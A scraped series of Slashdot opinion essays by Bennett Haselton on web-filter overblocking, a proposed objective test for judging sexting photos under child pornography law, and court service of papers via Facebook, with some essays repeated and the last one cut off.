    When the ACLU of Washington sued the North County Regional Library system for enabling blocking software for all patrons (including adults), they asked me to test the Fortinet Web filter that the library was using. I used a random sample of 100,000 .com and 100,000 .org domains and ran them through an automated script to find 536 .com domains and 207 .org domains that were blocked by Fortinet. Of those, about one out of every eight .com sites categorized as "Pornography" or "Adult Materials," and one of out of every four .org sites blocked in those categories, was a site with content that could not possibly be considered "adult" — some of the sites blocked in these categories included the Dabar Worship Center, the immigrant-rights group Families for Freedom, and the Seattle Women's Jazz Orchestra. Extrapolating these ratios to the set of all .com and .org domains in existence, one could conclude that there were about 71,000 non-pornographic .com sites and 5,800 non-pornographic .org sites blocked by FortiNet as "Pornography" or "Adult Materials" — a number almost certain to grow into six figures when you add in all the sites outside of .com and .org. Years earlier, I had run similar tests for Cyber Patrol and SurfWatch (products which have since been discontinued) and found that an absolute majority of sites blocked by each program were actually non-pornographic, which translated into an estimate of hundreds of thousands of .com and .org sites wrongly classified as "porn."

    Only the blocking companies know for sure how such stupid mistakes end up on their lists, but the most widely accepted explanation is that they use machines to crawl the Web and guess which sites are pornographic, and add those sites to their blacklists without any human intervention. In their early years, the makers of SurfWatch and Cyber Patrol claimed that employees actually did review sites before adding them to their lists, but that claim became increasingly untenable as more and more reports came out of sites being blocked with no adult content on them.

    Nobody has yet done a similar study for the ENA blocking program, but every blocking program that has ever been tested has had a non-trivial error rate that extrapolates to at least hundreds of thousands of non-pornographic websites being blocked under "Pornography" and similar categories. There is no reason to think that the ENA blocker is different; at the very least, if they claim that it is, then the burden of proof should be on them.

    So, the ACLU will probably succeed in persuading the Tennessee Schools Cooperative to stop blocking the "LGBT" category, but that doesn't mean that LGBT sites — or any other category of non-pornographic sites — will no longer be blocked. A student who encounters a blocked LGBT site could request an override, but what if they don't want to "out" themselves as someone who was browsing an LGBT site? Is Tennessee the best place to be known as the "queer who wanted to get around the porn filter"? And there may not be an option of getting an override anyway. Some of the correspondents on Peacefire's mailing list for new proxy sites to get around blockers are teachers who aren't given a password to bypass the blocker on their school's computers.

    Then of course — you know what's coming — there is the other "larger sense" in which unblocking the LGBT category doesn't "fix the problem," which is that there would be no "problem" if we didn't think of teenagers as children instead of adults. You've probably already decided which side you're on in that debate, but consider it as a scientific question instead of a moral one. Do you think there is any objective evidence that teenagers, if they were given the opportunity to have the same rights and responsibilities as adults, would behave differently from adults to a large degree — more differently than, say, men and women behave from each other? The trouble with the "evidence" that we gather from personal interactions is that it's not truly objective — if someone believes that teenagers are immature and adults are not, they're likely to see and remember only the pieces of evidence that confirm that belief. A true double-blind experiment might involve talking to someone through a computer terminal and rating the other person's "maturity" just based on their responses. That's a start, but the trouble with that experiment is that adults tend to know a larger set of words, so a participant might rate the other person as more "mature" because of their large vocabulary, even though having a large vocabulary is completely different from having mature thoughts or logical reasoning skills. A fairer test might be to take a non-native-English-speaking adult and a native-English-speaking young teenager who scored about the same on a test of English vocabulary, and see if participants could tell the difference in maturity between those two test subjects while talking to them through a computer terminal. I am not aware of any experiment along these lines that has been done, but this is the sort of evidence of differences between adults and minors, that would be truly objective.

    Most of the evidence in favor of the innate "adulthood" of teenagers is also anecdotal and not scientific, but it is compelling. As psychologist Robert Epstein has pointed out in The Case Against Adolescence, for thousands of years humans in their early teens were giving birth and raising children of their own. That obviously does not mean that that is a good idea in today's society, it just means that somewhere along the way, we must have lost sight of the level of responsibility that human teenagers are biologically capable of handling. If one of our Stone Age forebears could be brought back to life, he might eventually get used to the Web, but he'd probably always be amused by the idea of Web blockers for teenagers who are older than he was when he was raising his first child.

  33. Worst Censorware Blocks Cannot Be Fixed

    Features · · posted by CmdrTaco · from the speak-the-truth dept. · 420 comments
    Slashdot regular Bennett Haselton writes "The ACLU has targeted a group of Tennessee school districts for blocking websites categorized by a blocking company as 'LGBT.' I hope the ACLU wins, but it may create the mistaken impression that egregious overblocking of websites is easy to fix. On the contrary, the vast majority of errors are hard-coded into the products and cannot be fixed by unblocking a single category." Hit that tantalizingly entitled 'Read More' link to read his essay.

    The ACLU is threatening to sue a group of Tennessee School Districts for using blocking software that blocks sites categorized as "LGBT" — that is, sites themed around lesbian, gay, bisexual or transgender issues that would not be classified as pornographic. Some of the blocked sites include the Gay and Lesbian Alliance Against Defamation and the Human Rights Campaign.

    Legally, the school districts' decision to block these sites seems fairly indefensible. The content being censored is political speech, not illegal to distribute to minors, and as the ACLU points out, by blocking these sites the school districts are engaging in "viewpoint discrimination," since the schools allow access to anti-gay sites like Americans for Truth Against Homosexuality (which, ironically, features a disclaimer saying its content is not suitable for children). But, you never can tell with judges. A judge in Utah once ruled in favor of a school that suspended a student for wearing a t-shirt with the word "Vegan." (Do you think the judge would have made the same ruling if the student's t-shirt had said "Christian"?)

    However, while the ACLU would be right to bring this case, there may be another unintended side effect. By focusing on the fact that the "LGBT" category is enabled to be blocked in these districts, this sets up a contrast with districts that do not have the "LGBT" category enabled, which could lead people to think that such districts are not blocking LGBT sites. This is not the case.

    When a school district buys blocking software, the software comes with an encrypted list of websites listed in different categories; categories like Pornography and Nudity are typically blocked, while categories like LGBT would usually not be. If a site falls into one or more of the blocked categories, then attempts to access that site will be blocked (at least until some reprobates help you get around the filter.) However, it's the blocking company that decides what to put on the list under each category. And even if only categories like "Pornography" are enabled, there are likely to be many non-pornographic sites categorized as "Pornography," and hence blocked wherever that category is turned on.

    When the ACLU of Washington sued the North County Regional Library system for enabling blocking software for all patrons (including adults), they asked me to test the Fortinet Web filter that the library was using. I used a random sample of 100,000 .com and 100,000 .org domains and ran them through an automated script to find 536 .com domains and 207 .org domains that were blocked by Fortinet. Of those, about one out of every eight .com sites categorized as "Pornography" or "Adult Materials," and one of out of every four .org sites blocked in those categories, was a site with content that could not possibly be considered "adult" — some of the sites blocked in these categories included the Dabar Worship Center, the immigrant-rights group Families for Freedom, and the Seattle Women's Jazz Orchestra. Extrapolating these ratios to the set of all .com and .org domains in existence, one could conclude that there were about 71,000 non-pornographic .com sites and 5,800 non-pornographic .org sites blocked by FortiNet as "Pornography" or "Adult Materials" — a number almost certain to grow into six figures when you add in all the sites outside of .com and .org. Years earlier, I had run similar tests for Cyber Patrol and SurfWatch (products which have since been discontinued) and found that an absolute majority of sites blocked by each program were actually non-pornographic, which translated into an estimate of hundreds of thousands of .com and .org sites wrongly classified as "porn."

    Only the blocking companies know for sure how such stupid mistakes end up on their lists, but the most widely accepted explanation is that they use machines to crawl the Web and guess which sites are pornographic, and add those sites to their blacklists without any human intervention. In their early years, the makers of SurfWatch and Cyber Patrol claimed that employees actually did review sites before adding them to their lists, but that claim became increasingly untenable as more and more reports came out of sites being blocked with no adult content on them.

    Nobody has yet done a similar study for the ENA blocking program, but every blocking program that has ever been tested has had a non-trivial error rate that extrapolates to at least hundreds of thousands of non-pornographic websites being blocked under "Pornography" and similar categories. There is no reason to think that the ENA blocker is different; at the very least, if they claim that it is, then the burden of proof should be on them.

    So, the ACLU will probably succeed in persuading the Tennessee Schools Cooperative to stop blocking the "LGBT" category, but that doesn't mean that LGBT sites — or any other category of non-pornographic sites — will no longer be blocked. A student who encounters a blocked LGBT site could request an override, but what if they don't want to "out" themselves as someone who was browsing an LGBT site? Is Tennessee the best place to be known as the "queer who wanted to get around the porn filter"? And there may not be an option of getting an override anyway. Some of the correspondents on Peacefire's mailing list for new proxy sites to get around blockers are teachers who aren't given a password to bypass the blocker on their school's computers.

    Then of course — you know what's coming — there is the other "larger sense" in which unblocking the LGBT category doesn't "fix the problem," which is that there would be no "problem" if we didn't think of teenagers as children instead of adults. You've probably already decided which side you're on in that debate, but consider it as a scientific question instead of a moral one. Do you think there is any objective evidence that teenagers, if they were given the opportunity to have the same rights and responsibilities as adults, would behave differently from adults to a large degree — more differently than, say, men and women behave from each other? The trouble with the "evidence" that we gather from personal interactions is that it's not truly objective — if someone believes that teenagers are immature and adults are not, they're likely to see and remember only the pieces of evidence that confirm that belief. A true double-blind experiment might involve talking to someone through a computer terminal and rating the other person's "maturity" just based on their responses. That's a start, but the trouble with that experiment is that adults tend to know a larger set of words, so a participant might rate the other person as more "mature" because of their large vocabulary, even though having a large vocabulary is completely different from having mature thoughts or logical reasoning skills. A fairer test might be to take a non-native-English-speaking adult and a native-English-speaking young teenager who scored about the same on a test of English vocabulary, and see if participants could tell the difference in maturity between those two test subjects while talking to them through a computer terminal. I am not aware of any experiment along these lines that has been done, but this is the sort of evidence of differences between adults and minors, that would be truly objective.

    Most of the evidence in favor of the innate "adulthood" of teenagers is also anecdotal and not scientific, but it is compelling. As psychologist Robert Epstein has pointed out in The Case Against Adolescence, for thousands of years humans in their early teens were giving birth and raising children of their own. That obviously does not mean that that is a good idea in today's society, it just means that somewhere along the way, we must have lost sight of the level of responsibility that human teenagers are biologically capable of handling. If one of our Stone Age forebears could be brought back to life, he might eventually get used to the Web, but he'd probably always be amused by the idea of Web blockers for teenagers who are older than he was when he was raising his first child.

  34. Worst Censorware Blocks Cannot Be Fixed

    Features · · posted by CmdrTaco · from the speak-the-truth dept. · 420 comments
    Slashdot regular Bennett Haselton writes "The ACLU has targeted a group of Tennessee school districts for blocking websites categorized by a blocking company as 'LGBT.' I hope the ACLU wins, but it may create the mistaken impression that egregious overblocking of websites is easy to fix. On the contrary, the vast majority of errors are hard-coded into the products and cannot be fixed by unblocking a single category." Hit that tantalizingly entitled 'Read More' link to read his essay.

    The ACLU is threatening to sue a group of Tennessee School Districts for using blocking software that blocks sites categorized as "LGBT" — that is, sites themed around lesbian, gay, bisexual or transgender issues that would not be classified as pornographic. Some of the blocked sites include the Gay and Lesbian Alliance Against Defamation and the Human Rights Campaign.

    Legally, the school districts' decision to block these sites seems fairly indefensible. The content being censored is political speech, not illegal to distribute to minors, and as the ACLU points out, by blocking these sites the school districts are engaging in "viewpoint discrimination," since the schools allow access to anti-gay sites like Americans for Truth Against Homosexuality (which, ironically, features a disclaimer saying its content is not suitable for children). But, you never can tell with judges. A judge in Utah once ruled in favor of a school that suspended a student for wearing a t-shirt with the word "Vegan." (Do you think the judge would have made the same ruling if the student's t-shirt had said "Christian"?)

    However, while the ACLU would be right to bring this case, there may be another unintended side effect. By focusing on the fact that the "LGBT" category is enabled to be blocked in these districts, this sets up a contrast with districts that do not have the "LGBT" category enabled, which could lead people to think that such districts are not blocking LGBT sites. This is not the case.

    When a school district buys blocking software, the software comes with an encrypted list of websites listed in different categories; categories like Pornography and Nudity are typically blocked, while categories like LGBT would usually not be. If a site falls into one or more of the blocked categories, then attempts to access that site will be blocked (at least until some reprobates help you get around the filter.) However, it's the blocking company that decides what to put on the list under each category. And even if only categories like "Pornography" are enabled, there are likely to be many non-pornographic sites categorized as "Pornography," and hence blocked wherever that category is turned on.

    When the ACLU of Washington sued the North County Regional Library system for enabling blocking software for all patrons (including adults), they asked me to test the Fortinet Web filter that the library was using. I used a random sample of 100,000 .com and 100,000 .org domains and ran them through an automated script to find 536 .com domains and 207 .org domains that were blocked by Fortinet. Of those, about one out of every eight .com sites categorized as "Pornography" or "Adult Materials," and one of out of every four .org sites blocked in those categories, was a site with content that could not possibly be considered "adult" — some of the sites blocked in these categories included the Dabar Worship Center, the immigrant-rights group Families for Freedom, and the Seattle Women's Jazz Orchestra. Extrapolating these ratios to the set of all .com and .org domains in existence, one could conclude that there were about 71,000 non-pornographic .com sites and 5,800 non-pornographic .org sites blocked by FortiNet as "Pornography" or "Adult Materials" — a number almost certain to grow into six figures when you add in all the sites outside of .com and .org. Years earlier, I had run similar tests for Cyber Patrol and SurfWatch (products which have since been discontinued) and found that an absolute majority of sites blocked by each program were actually non-pornographic, which translated into an estimate of hundreds of thousands of .com and .org sites wrongly classified as "porn."

    Only the blocking companies know for sure how such stupid mistakes end up on their lists, but the most widely accepted explanation is that they use machines to crawl the Web and guess which sites are pornographic, and add those sites to their blacklists without any human intervention. In their early years, the makers of SurfWatch and Cyber Patrol claimed that employees actually did review sites before adding them to their lists, but that claim became increasingly untenable as more and more reports came out of sites being blocked with no adult content on them.

    Nobody has yet done a similar study for the ENA blocking program, but every blocking program that has ever been tested has had a non-trivial error rate that extrapolates to at least hundreds of thousands of non-pornographic websites being blocked under "Pornography" and similar categories. There is no reason to think that the ENA blocker is different; at the very least, if they claim that it is, then the burden of proof should be on them.

    So, the ACLU will probably succeed in persuading the Tennessee Schools Cooperative to stop blocking the "LGBT" category, but that doesn't mean that LGBT sites — or any other category of non-pornographic sites — will no longer be blocked. A student who encounters a blocked LGBT site could request an override, but what if they don't want to "out" themselves as someone who was browsing an LGBT site? Is Tennessee the best place to be known as the "queer who wanted to get around the porn filter"? And there may not be an option of getting an override anyway. Some of the correspondents on Peacefire's mailing list for new proxy sites to get around blockers are teachers who aren't given a password to bypass the blocker on their school's computers.

    Then of course — you know what's coming — there is the other "larger sense" in which unblocking the LGBT category doesn't "fix the problem," which is that there would be no "problem" if we didn't think of teenagers as children instead of adults. You've probably already decided which side you're on in that debate, but consider it as a scientific question instead of a moral one. Do you think there is any objective evidence that teenagers, if they were given the opportunity to have the same rights and responsibilities as adults, would behave differently from adults to a large degree — more differently than, say, men and women behave from each other? The trouble with the "evidence" that we gather from personal interactions is that it's not truly objective — if someone believes that teenagers are immature and adults are not, they're likely to see and remember only the pieces of evidence that confirm that belief. A true double-blind experiment might involve talking to someone through a computer terminal and rating the other person's "maturity" just based on their responses. That's a start, but the trouble with that experiment is that adults tend to know a larger set of words, so a participant might rate the other person as more "mature" because of their large vocabulary, even though having a large vocabulary is completely different from having mature thoughts or logical reasoning skills. A fairer test might be to take a non-native-English-speaking adult and a native-English-speaking young teenager who scored about the same on a test of English vocabulary, and see if participants could tell the difference in maturity between those two test subjects while talking to them through a computer terminal. I am not aware of any experiment along these lines that has been done, but this is the sort of evidence of differences between adults and minors, that would be truly objective.

    Most of the evidence in favor of the innate "adulthood" of teenagers is also anecdotal and not scientific, but it is compelling. As psychologist Robert Epstein has pointed out in The Case Against Adolescence, for thousands of years humans in their early teens were giving birth and raising children of their own. That obviously does not mean that that is a good idea in today's society, it just means that somewhere along the way, we must have lost sight of the level of responsibility that human teenagers are biologically capable of handling. If one of our Stone Age forebears could be brought back to life, he might eventually get used to the Web, but he'd probably always be amused by the idea of Web blockers for teenagers who are older than he was when he was raising his first child.

  35. Is That "Sexting" Pic Illegal? A Scientific Test

    Features · · posted by CmdrTaco · from the i-like-the-testing-part dept. · 711 comments
    Frequent Slashdot contributor Bennett Haselton writes " Amid the latest 'sexting' controversy, here is a proposal for a scientifically objective method to determine whether a picture constitutes child pornography. This is a harder problem than it seems, but not for the reasons you'd think. And it raises questions about how the same scientific principles could be applied to other matters of law." Hit the link below to read the sextiest story on Slashdot today.

    A county district attorney in Pennsylvania has threatened to file felony child pornography charges against three teenage girls for pictures that they took of themselves, even though the girls' lawyers say the pictures are clearly not sexually explicit and do not meet the legal definition of child porn. The American Civil Liberties Union has countered by asking a federal judge to block District Attorney George Skumanick from filing charges.

    Skumanick won't show the pictures to anyone, including the girls' lawyers, but according to the reported descriptions, one picture shows two of the girls flashing the peace sign in their bras, and the other picture shows a girl wrapped in a towel with her breasts exposed after stepping out of the shower. Unless there's something very significant being deliberately left out of those descriptions, it sounds pretty obvious that the pictures do not meet the definition of child pornography, which requires sexual explicitness, not just nudity.

    Skumanick may even sound like a buffoon for threatening to prosecute the girls over those pictures, but his overreaching is probably an example of the "context syndrome" that I referred to in writing about a Wikipedia article about a CD showing a naked underage girl on the cover. In that article, I wrote:

    Suppose you read a news article about a man who was arrested for possession of child pornography, and you happened to see a sample of the images (never mind how) that he was arrested for. And suppose the Virgin Killer album cover photo had been mixed in with those images. Would it have jumped out at you as an obvious case of over-reaching by the police?

    In other words, even an obviously legal photo might seem illegal when it's mixed in with a group of photos that constitute actual child porn. According to the AP, Skumanick's office first found the photos in question after confiscating students' cell phones and rounding up 20 students accused of making or distributing the images found on the phones. Some of those other photos were presumably racy enough to meet the definition of child pornography, and Skumanick probably just lumped in the bra and towel pictures into that category without thinking too much about it. Giving him credit, if someone had come to his office and shown him the picture of the towel girl by itself and asked him to prosecute the girl for creating child pornography, he might have said that it didn't meet the legal definition.

    But the "context syndrome" only excuses the initial mistake, and only partly. By now, he's had time to think about those particular pictures, and he knows that non-sexually-explicit photos do not constitute child pornography, so what is he doing? He claims that the girls in their bras were posed "provocatively", but that's not the same as sexual explicitness, and he hasn't even made that claim about the towel picture, so unless there's some bombshell piece of information about the photos that he's still keeping secret (and why would he?), there's no excuse for him not to drop the threats of prosecution right away.

    But could even the initial mistake have been avoided? I think it could have, if you designed a scientific procedure for deciding, objectively, whether an image meets the legal definition of "child pornography", by borrowing some of the principles used in police lineups.

    Now, obviously one big difference between deciding if the right suspect has been identified in a lineup, and deciding whether an image constitutes child pornography, is that the question of a suspect's identity in a lineup is a question about objective reality, while the question of whether an image is "child pornography" is a matter of opinion and consensus about an imprecisely defined English phrase, so it may sound odd to try and find a "scientifically objective" answer. But by "objective", I mean that the procedure should eliminate the influence of factors that are not relevant to the legal definition of child pornography (for example, if asking someone to decide if they think a picture meets the definition, don't tell them whether the photo was found in a pedophile's basement or in a parent's photo album, because under the strict legal definition, that shouldn't matter). And by "scientific", I mean that the Yes/No answers returned by the procedure should be repeatable as far as possible, so that different defendants aren't being tried under wildly different standards, where Bob is convicted of possessing an innocuous photo while Alice is acquitted even though she possessed a racier one.

    A naive solution, from a scientific point of view, would be to poll a random sample of lawyers or other professionals in a police go-to database, and ask them to evaluate whether the picture is child pornography, without any information about where the picture came from. These results would be objective (if the respondents didn't know the source of the picture), and would generally be repeatable, if the sample size is large enough. The problem with this method is that while all defendants would be held to the same standard, all citizens would not be. Suppose the lawyers in the go-to list start to decide, as many of them probably would, that anybody who is being prosecuted for possessing a picture of a topless underage girl is probably a pedophile creep anyway, and would start voting "child pornography" for all but the most obviously legal pictures. The prosecutor would realize this, and would know that they could threaten to ruin people's lives by charging them with possession of child pornography because of pictures found in their possession -- even while other members of society possessed similar pictures without ever being charged.

    Here's where the analogy to a police lineup comes in. Police lineups are supposed to include "known innocent" candidates in order to test the credibility of the eyewitness; if the eyewitness selects a candidate who could not have possibly committed the crime (because, for example, they were in jail), then the police know the eyewitness is not reliable. (This was one guideline notoriously violated by District Attorney Mike Nifong in the Duke lacrosse team rape trial; he assembled a lineup consisting only of lacrosse team members from the party, so that whomever the eyewitness identified was guaranteed to fall under a cloud of suspicion.) In the same vein, the lawyers or other experts being consulted by the police could be shown a "lineup" of photos, consisting of several photos that were determined in advance to be legal (either because of a prior court ruling, or perhaps just because the D.A. had declined to prosecute the photos on previous occasions), along with the photo whose legality was in question. Ask the experts to pick which photo they think is closest to the definition of child pornography. Unless most of them pick the photo that's on trial, then that photo can't be said to be worse than any of the other photos that had already been deemed legal.

    This is closer to a fair solution, but there's still a big loophole. When police assemble candidates for a lineup, they are supposed to pick candidates who match the general physical description given by the eyewitness. If the eyewitness said they were attacked by a redhead, the police can't fill out the lineup with one redheaded suspect that they want to railroad, and 10 blondes. Because attributes like "Caucasian" and "redhead" are pretty straightforward, if the rules for lineups are being enforced properly, the police don't have a lot of wiggle room to fill out the lineup with candidates who blatantly don't match the description. Unfortunately, it would be a lot easier to cheat when creating a "lineup" of photos to compare against a photo whose owner was on trial for possessing child pornography. If the photo at issue is probably legal but still provocative, then the police could fill out the rest of the lineup with completely non-sexual but perhaps eyebrow-raising photos, like a naked teenage girl watering some houseplants. Then when the police ask, "Which of these does not belong?", everybody would pick the provocative one, and the police would take that as "vindication".

    The only way I can think of to guard against this, would be to let the defense counsel pick the other photos in the lineup, and then they could pick the most "provocative" ones that were still legal! For any photos that have been declared legal in the past, the defense ought to be able to argue that if an independent panel of experts doesn't think their client's pictures are any worse than those, then their client should not be prosecuted either. (If the defense lawyer decided their client was a child molester and wanted to throw them to the wolves, they could deliberately pick non-sexual photos for the lineup, so that their client's photo gets pegged as the odd one out -- but when the defense lawyer decides to railroad their own client, it's almost impossible for the system to guard against that anyway. Also, it's probably not a good idea to make this an option for child pornography defendants who decide to represent themselves, so that they can rifle through thousands of photographs of naked children, even legal ones, to find the pictures that they think are the "sexiest" to use for their defense.)

    Perhaps someone can think of a better method that is still roughly scientific, in the sense of trying everyone according to the same standard and giving repeatable results. The irony is that despite the potential of child pornography charges to destroy a person's life, it is in possible in principle to try child pornography cases more objectively than almost any other type of crime, because you can separate out the alleged criminal act from everything else about the defendant, and let people examine the evidence of criminality in isolation. If someone shoots a person and claims it was self-defense, it's hard to imagine how you could distill out only the relevant facts of the case, and pass along just those facts to some third-party observer who then renders a judgment without knowing anything else. Half the courtroom battle is over what facts are "relevant" in the first place. But in the case of a child pornography charge, you can give the photo -- and no other information -- to an expert, and ask them to make a judgment.

    I know, I know. The police and prosecutors are not actually doing to do this. But that in itself says something. Even if it's not possible to try most crimes in a truly objective fashion, why don't the courts and the police do this when it is possible? Many first-year psychology students that have an intuitive grasp of the principles of sound double-blind testing, could probably come up with a procedure better than the one I've described. When you've spent long enough thinking about how to design experiments objectively, you can't even hear about lawyers arguing over whether a photo constitutes child pornography, without the thought popping into your head: "Have a group of experts look at the photo and rate it, independently of each other. Compare the results to a 'control' result where the experts look at a photo that is not child pornography." And so on. Why don't those suggestions ever come from within the legal profession itself?

    And on the flip side, what about using scientific methods to examine facts about the legal system? When considering that judges are tasked with evaluating parties' claims in an objective and fair manner, one could ask: Are they really being objective? What are different ways that we could test this? Perhaps by having two actors in different courtrooms on the same day, charged with exactly the same crime under the same circumstances, except one is black and the other is white, and repeat the experiment many times to see if they receive different average sentences. For a scientist, the idea is the most natural thing in the world. Forget the fact that the legal system doesn't do this -- why is virtually nobody in the legal profession even suggesting it?

    Probably because most people who think in terms of objective experimental design are drawn towards the hard sciences, not toward law. That's probably a good thing; such people can likely do more good as physicists and research psychologists than they could as lawyers and policemen. But they can still speak out for the principles of science to be applied wherever possible, in any area where objectivity is important -- especially the law.

    All true scientists at heart should keep telling the world that "science" is not just a label that encompasses nerd subjects like biology, physics, and chemistry, with other subjects like art and law being "outside the domain of science". While the statements made within the framework of those subjects are not scientific ("This painting is pretty", "The court finds the defendant not liable", etc.), science can make statements about the people in those professions and the patterns in the conclusions that they reach. If art experts are evaluating paintings differently depending on whether they think the paintings come from an art gallery or a 4-year-old's kitchen table, you could find that out through a scientific experiment. If judges are giving an easier time to lawyers than they are to parties who represent themselves, even when they make exactly identical arguments, you could test that hypothesis with an experiment, too. And scientific principles could be used to draw up procedures for trying cases more objectively, as in the procedure for deciding the legality of sexting photographs. We just need to get over the idea that "scientists" should limit themselves to the forensic CSI stuff and then stay away from the legal arena because that's a "separate domain". Science could tell us quite a lot about how fairly justice is dispensed in the courtroom, and sometimes even how to fix the problems.

  36. Service Via Facebook Shouldn't Always "Count"

    Features · · posted by CmdrTaco · from the one-two-threeee-ah-ah-ah dept. · 80 comments
    Frequent Slashdot contributor Bennett Haselton writes "A New Zealand court has allowed a plaintiff to serve papers on a defendant via Facebook, following a similar ruling from an Australian court last year. But as these rulings do not necessarily mean, as Facebook announced in a press release, that the courts have endorsed Facebook 'as a reliable, secure and private medium for communication.' The trend could lead to abuses if courts start taking 'Facebook service' too seriously." For more of the many words written by Bennett, hop on that curiously named link right below.

    A New Zealand court has ruled that a plaintiff can serve papers on a defendant via a message sent to their Facebook account. Last December, an Australian court ruled that a company could serve papers on a couple after failed attempts to reach them by regular mail and e-mail. Facebook responded to the ruling with a statement that said, "We're pleased to see the Australian court validate Facebook as a reliable, secure and private medium for communication. The ruling is also an interesting indication of the increasing role that Facebook is playing in people's lives." I think there are two interesting questions here: (1) Is that really how courts view service via Facebook? And (2) What will happen if courts do begin to view service via Facebook that way?

    As to the first question — the court's endorsement of service via Facebook does not mean that they think the service is necessarily secure or reliable. Courts often let you serve papers on a party in a court case via means that are less reliable than normal channels, provided that you've exhausted the more reliable means first. When I was trying to earn my way into heaven by suing spammers in Small Claims court, some states allowed corporations to be served by serving the papers on the Secretary of State in the corporation's home state, but only if you could prove that you had tried and failed to serve the corporation at their registered address. In cases where I served the Secretary of State, it's unlikely that the defendant ever even saw the papers (since the only thing the Secretary of State could do with them was forward them to the defendants' address on file, where I'd already tried to locate them), but it still "counted" because I had exhausted the regular means of serving the documents. Sometimes when serving an individual, if the sheriff couldn't reach someone at home, a judge would sign an order allowing the legal papers to be stuck to their front door (which is neither "secure" nor "reliable"), but only after the sheriff had been unable to deliver it to them in person. So a court's endorsement of Facebook as a means of service doesn't necessarily mean the court thinks that the means of service is reliable. It just means it's a good last resort when conventional methods haven't worked.

    Facebook is not, after all, secure or reliable, although these limitations are not the fault of Facebook itself. By "not reliable," I don't mean that it loses or mis-routes messages — I've never seen that happen — but that you have no idea whether someone has signed in to read a message, or deleted it by accident, or lost it among all the other messages that they received. As for whether it's "secure," like most services, the greatest weakness in Facebook's security is in the 'forgot your password' feature — if you compromise someone's e-mail account, then you can have a password reset link sent to their e-mail address and compromise their Facebook account as well. So your Facebook account is only as secure as your e-mail account, and e-mail accounts are usually vulnerable in their own "forgot your password" feature, which often lets you access someone's e-mail account just by knowing their birth date, their zip code, and the answer to an easy question like "Who is your favorite fictional character?" And in any case, obtaining "service" via Facebook doesn't preclude the possibility that the person you served on Facebook was an impostor, or another person who happened to have the same name.

    What would really change the game would be if courts started ruling that service via Facebook was valid even without first attempting to serve a party via mail or other means. I had my own experience with a case like this in 2000, when programmers Matthew Skala and Eddy Jansson released a program called "CPHack" which could decode the encrypted list of sites blocked by a program called Cyber Patrol, so that people who owned copies of the program could use CPHack to decrypt the list of blocked sites. (One of the more controversial aspects of such blocking software is that the list of blocked sites is hidden from purchasers of the program.) A judge granted Cyber Patrol a ruling forbidding the authors from distributing the program, and ordering anyone hosting a mirror copy of the program to remove it as well. That same day, I received a copy of the ruling via e-mail from Cyber Patrol's lawyer, ordering us to remove the mirror from the Peacefire site. I asked a lawyer if that was considered valid service (this was back when I still thought that a legal question like that always had an objective answer, as opposed to the question of "valid service" being an entirely subjective one that depended on what judge you happened to get), and he said that I shouldn't take any chances and should take the mirror down anyway, which we did. Dozens of other mirror sites, which had sprung up in anticipation of the legal controversy, were also served with papers, although the overseas ones mostly ignored them.

    So this was very different from a ruling made by the 9th Circuit Court of Appeals two years later, allowing a Las Vegas casino to serve an offshore company via e-mail because regular methods had failed. The court in that case wrote, "When faced with an international e-business scofflaw playing hide-and-seek with the federal court, e-mail may be the only means of effecting service of process." But I was a domestic scofflaw whose mailing address was publicly known (in the WHOIS registration for the Peacefire site). What was the rationale for allowing me to be served by e-mail?

    Unfortunately I think it's probably just a case where the rules were vague enough that the judge felt entitled to bend them to achieve an outcome that he wanted. The 9th Circuit didn't leave much doubt as to the level of objectivity in their ruling on e-mail service either, in calling the defendant an "international e-business scofflaw."

    And these are the two main reasons why I think that allowing electronic "insta-service" via e-mail or Facebook — in cases where parties have not first tried to serve papers via regular means — would erode the rights of the little guy. First, in most of the cases I can think of where a powerful plaintiff was playing "whack-a-mole" with multiple defendants by using electronic service of process to shut down new sites as fast as they were springing up, the goal they were trying to achieve was (a) futile, if half the mirror sites were overseas anyway, and (b) ultimately incompatible with civil liberties. (Why shouldn't people have the right to decrypt the list of sites blocked by Cyber Patrol? After the ACLU got involved on appeal, a higher court ultimately ruled that mirror sites could not be ordered to take down CPHack. The HD DVD encryption key controversy is another well-known example.) In cases where a plaintiff has a legitimate claim against multiple sites — for example, sites that are violating the plaintiff's copyright by hosting unauthorized copies of content that they own — most service providers already publish an e-mail address where copyright owners can send a DMCA takedown notice, and where the copyright owner is risking large statutory financial penalties if they send a takedown notice that turns out to be baseless. There are no similar protections to prevent abuses of the system through electronic service of other kinds of legal notices.

    The other reason this trend could work against the average person, is that any vague rule that is not consistently followed by different judges, puts non-lawyers at a disadvantage in court. Partly because it may confuse non-lawyers who hear that e-mail service was allowed in one case, and think that's part of "the rules," and then find that e-mail service was disallowed in another case, and wonder how "the rules" could allow it in one case but not in another, all the while laboring under the mistaken impression that there actually are "rules" which unambiguously determine whether or not e-mail service is allowed, when the truth is that it's just up to each individual judge. But also because every ambiguity in the rules is another opportunity for the judge's prejudices to influence the outcome. I do not think that most judges are prejudiced against people based on race or gender, but I doubt you could find any legal professional who thinks that most judges would take a case equally seriously regardless of whether it was brought by a professional lawyer or by a layperson representing themselves. (At one point in my spammer-suing career, I had only about a 50-50 chance of my motions even being read.)

    So, let's not get carried away applauding judges for being "hip" and "with it" for allowing service via e-mail or Facebook. And if they start allowing it more frequently, can we at least ask that they pick one rule and stick with it?

  37. Service Via Facebook Shouldn't Always "Count"

    Features · · posted by CmdrTaco · from the one-two-threeee-ah-ah-ah dept. · 80 comments
    Frequent Slashdot contributor Bennett Haselton writes "A New Zealand court has allowed a plaintiff to serve papers on a defendant via Facebook, following a similar ruling from an Australian court last year. But as these rulings do not necessarily mean, as Facebook announced in a press release, that the courts have endorsed Facebook 'as a reliable, secure and private medium for communication.' The trend could lead to abuses if courts start taking 'Facebook service' too seriously." For more of the many words written by Bennett, hop on that curiously named link right below.

    A New Zealand court has ruled that a plaintiff can serve papers on a defendant via a message sent to their Facebook account. Last December, an Australian court ruled that a company could serve papers on a couple after failed attempts to reach them by regular mail and e-mail. Facebook responded to the ruling with a statement that said, "We're pleased to see the Australian court validate Facebook as a reliable, secure and private medium for communication. The ruling is also an interesting indication of the increasing role that Facebook is playing in people's lives." I think there are two interesting questions here: (1) Is that really how courts view service via Facebook? And (2) What will happen if courts do begin to view service via Facebook that way?

